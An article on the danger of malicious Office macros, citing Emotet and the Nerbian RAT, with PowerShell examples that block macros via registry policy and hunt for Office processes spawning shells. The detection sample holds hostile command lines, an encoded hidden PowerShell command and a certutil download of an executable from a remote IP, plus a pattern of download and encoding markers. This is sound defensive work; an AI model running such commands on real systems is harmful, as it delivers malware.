‘Updated expense policy – please read’, reads the subject line from HR, writes Timothy Clark MBCS, a Full-Stack Software Engineer. You open the attached Word document. The first page tells you that you need to click the ‘Enable Content’ button in the yellow banner to view the full document.
You click. One click.
One click and your computer has joined an army. A zombie army of computers that can be leveraged by any hacker with the money to pay for access. One day it’s distributing ransomware, another time it’s being used in a denial of service attack, and periodically it’s recruiting more machines with even more macros.
Macros are one of several reasons why the advice to ‘think before you click on attachments’ is so ubiquitous. Email has been, and continues to be, the most popular way to infiltrate an organisation, providing a direct channel to phish employees and deliver malware to them. Research conducted by the Identity Theft Resource Centre shows that email phishing remains the number one cause of data breaches in the US.
We should establish what we mean by a ‘macro’. A macro in Microsoft Office is a sequence of instructions, written in Visual Basic for Applications (VBA), that chains together functionality already built into the application in order to automate repetitive or time-consuming tasks. The problem is that VBA is a full programming language with access to the file system, the network and the operating system shell, so a malicious macro is not limited to formatting cells: it can download and execute arbitrary code on the victim’s machine.
Old as the technique is, Office macros continue to be a threat, and have been employed by one of the most significant cybercrime operations of our time: Emotet. Emotet provides a ‘botnet as a service’, a coordinated collection of compromised computers that will do whatever the paying hacker wishes. Researchers found that in several cases, macro-laden Excel files were sent to the victims which, when ‘Enable Content’ is clicked, would compromise the target machine and enslave it as a puppet of the Emotet network.
Another example of a modern threat using this archaic method of compromise is the Nerbian RAT (Remote Access Trojan). Even though the RAT itself is written in Go, it relies on macros to run malicious PowerShell scripts that download the RAT from a remote server. Once on your system, it is capable of logging keystrokes (thereby intercepting passwords and other sensitive information you type) and even capturing your screen.
Universities and schools are particularly vulnerable to this vector of attack, as they often run outdated software and don’t have the resources to train huge numbers of students and staff. Sometimes the macros sent will hijack the mailbox of the victim, thereby providing automated means for an attacker to distribute toxic emails institution-wide. Without a dedicated Information Security officer (which many education institutions either can’t or won’t pay for), they may be woefully unprepared for such an attack and the impact can cause tremendous damage.
This doesn’t mean that larger companies that employ CISOs are immune either. Any organisation with a few overly-trusting employees can be compromised. The power of a single click. In larger environments it is possible for sophisticated malware such as Emotet or Nerbian to remain unnoticed for a long time, and chances are that the employee who unwittingly ran the malicious macros may take some time to realise their machine has been compromised.
So, what can you do?
This issue has been plaguing organisations of all shapes and sizes for decades and still seems to be going strong. Luckily, there is good news on the horizon and various strategies you can implement to mitigate this attack vector.
Disable macros
Seems pretty obvious – why do we even need these things anyway? Well, if everyone in your company thinks that, disabling them domain-wide is probably a good idea. Sometimes they do serve a useful purpose, however, so a discussion may be warranted with employees to establish the legitimate use cases and, where they exist, to allow only digitally signed macros from a known publisher. Microsoft now blocks macros by default in Office files that arrive from the internet, including email attachments, which should allow many information security practitioners to sleep better at night.
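As an added example (not part of the original article), the script below applies the macro-blocking settings described above for the current user via the registry. The key paths and value names are the ones the Office Group Policy templates write to, so the same values can be pushed domain-wide through Group Policy; the Office version key `16.0` (Office 2016/2019/Microsoft 365) and the application list are assumptions for the example.

```powershell
# Added example: lock down Office macros for the current user via the policy
# registry keys. Assumes Office version key 16.0 (Office 2016 / 2019 / 365);
# adjust $OfficeVersion for older installs. Run in an elevated or normal
# PowerShell session as the user whose Office profile you want to harden.
$OfficeVersion = '16.0'
$Apps = 'Word', 'Excel', 'PowerPoint'

foreach ($app in $Apps) {
    $securityKey = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
    $trustedKey  = "$securityKey\Trusted Locations"

    foreach ($key in $securityKey, $trustedKey) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    }

    # VBAWarnings: 1 = enable all macros, 2 = disable with notification (the Office
    # default that shows the yellow 'Enable Content' bar), 3 = disable all except
    # digitally signed macros, 4 = disable all without notification.
    # 4 removes the one-click decision from the user entirely; use 3 instead if the
    # business relies on macros signed by a trusted publisher.
    Set-ItemProperty -Path $securityKey -Name 'VBAWarnings' -Value 4 -Type DWord

    # Block macros in files carrying the Mark of the Web (downloaded from the
    # internet or saved from an email attachment), regardless of VBAWarnings.
    Set-ItemProperty -Path $securityKey -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord

    # Trusted Locations bypass the macro settings above, so a document dropped into
    # one would still run its macros. Disable all trusted locations unless you have
    # audited them.
    Set-ItemProperty -Path $trustedKey -Name 'AllLocationsDisabled' -Value 1 -Type DWord
}

# Read the values back so the change can be verified (or checked by a compliance script).
foreach ($app in $Apps) {
    $securityKey = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
    $s = Get-ItemProperty -Path $securityKey
    $t = Get-ItemProperty -Path "$securityKey\Trusted Locations"
    '{0,-11} VBAWarnings={1} BlockFromInternet={2} TrustedLocationsDisabled={3}' -f `
        $app, $s.VBAWarnings, $s.blockcontentexecutionfrominternet, $t.AllLocationsDisabled
}
```

Values written under `HKCU:\Software\Policies` take precedence over the user-facing settings in the Trust Center, so a user cannot re-enable macros from the Office options dialog. Check the Trusted Locations and Trusted Publishers settings as part of the same change: a permissive trusted location silently undoes the `VBAWarnings` setting.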
Monitor your endpoints for compromise
Ensure you monitor all endpoints for malware, and for a larger estate consider endpoint detection and response (EDR) tooling that records process, file and network activity so that you have visibility when a machine is compromised. Such tools can also isolate a host, blocking its email or network access, to prevent the spread of these threats.
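The macro chains described for Emotet and Nerbian share one observable: an Office application spawning a shell or script host. As an added example (not part of the original article), the hunt below runs that check over process-creation records. The `$events` array is constructed sample data in the shape of Sysmon Event ID 1 fields; on a real endpoint you would feed it `Get-WinEvent` output or an EDR export instead, and the process lists and command-line markers are starting points to tune, not a complete rule set.

```powershell
# Added example: flag Office applications launching shells or script hosts, the
# typical first step of a malicious macro. The records below are constructed
# sample data modelled on Sysmon Event ID 1 (ParentImage / Image / CommandLine);
# the hosts, users and command lines are invented for the example.
$events = @(
    [pscustomobject]@{ Time='09:01:12'; Host='PC-017'; User='alice'
        ParentImage='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine='powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA' },
    [pscustomobject]@{ Time='09:01:13'; Host='PC-017'; User='alice'
        ParentImage='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image='C:\Windows\splwow64.exe'
        CommandLine='C:\Windows\splwow64.exe 12288' },                       # benign: print driver helper
    [pscustomobject]@{ Time='09:02:40'; Host='PC-022'; User='bob'
        ParentImage='C:\Windows\explorer.exe'
        Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine='powershell.exe -File C:\scripts\backup.ps1' },           # benign: not an Office parent
    [pscustomobject]@{ Time='09:05:03'; Host='PC-031'; User='carol'
        ParentImage='C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
        Image='C:\Windows\System32\cmd.exe'
        CommandLine='cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/x.exe C:\Users\carol\AppData\Local\Temp\x.exe' }
)

# Parents that should rarely spawn interpreters, and the children a macro reaches for.
$officeParents = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'MSACCESS.EXE'
$scriptHosts   = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe',
                 'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'bitsadmin.exe'

# Command-line markers that raise severity: hidden windows, encoded commands,
# download helpers and remote URLs.
$suspiciousArgs = '-enc|-encodedcommand|-w(indowstyle)?\s+hidden|-nop|https?://|' +
                  'downloadstring|downloadfile|urlcache|invoke-expression|\biex\b'

$findings = foreach ($e in $events) {
    $parent = Split-Path -Path $e.ParentImage -Leaf
    $child  = Split-Path -Path $e.Image -Leaf

    # -contains compares case-insensitively, so mixed-case image names still match.
    if (($officeParents -contains $parent) -and ($scriptHosts -contains $child)) {
        $severity = 'medium'
        if ($e.CommandLine -match $suspiciousArgs) { $severity = 'high' }
        [pscustomobject]@{
            Time        = $e.Time
            Host        = $e.Host
            User        = $e.User
            Chain       = "$parent -> $child"
            Severity    = $severity
            CommandLine = $e.CommandLine
        }
    }
}

# Two of the four sample records are flagged, both 'high': the WINWORD -> powershell
# encoded command and the EXCEL -> cmd certutil download. The print helper and the
# explorer-launched backup script are left alone.
$findings | Sort-Object Severity, Time | Format-Table -AutoSize -Wrap
```

The parent/child pairing is the part worth alerting on; the command-line markers only rank the results, because an attacker can avoid any particular flag while a macro still has to get from Office to a process that can fetch and run a payload. Expect some benign Office children (print helpers, add-in hosts, the protocol handler) and suppress them by image name rather than loosening the parent list.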
Don’t use email (if possible)
If your company uses tools such as Slack, Teams or Mattermost for communication, it might be a good idea to lean on them more. Reducing your dependence on email makes the remaining malicious messages much easier to spot. These tools can also receive dodgy documents and phishing messages, but if you restrict external communication to specific channels you reduce your exposure to such attacks.
Education, education, education
The most important piece of advice here which you can implement starting tomorrow is better training. Train employees to spot phishing emails and dodgy docs and they will be your eyes and ears for these attacks. Tell them to take this advice home with them – have they received suspicious personal email or text messages – how can they tell? Teach them the power of a single click. One click has the power to compromise several machines. One click has the power to cause major disruption to your organisation. One click may even close you down.
About the author
Timothy Clark is a Full-stack Software Engineer who also works as a Cybersecurity consultant, defending against the dark arts. Clark is currently chair of the BCS Preston & District branch and sits on the Early Career executive. He is also a journeyman in the Worshipful Company of Information Technologists.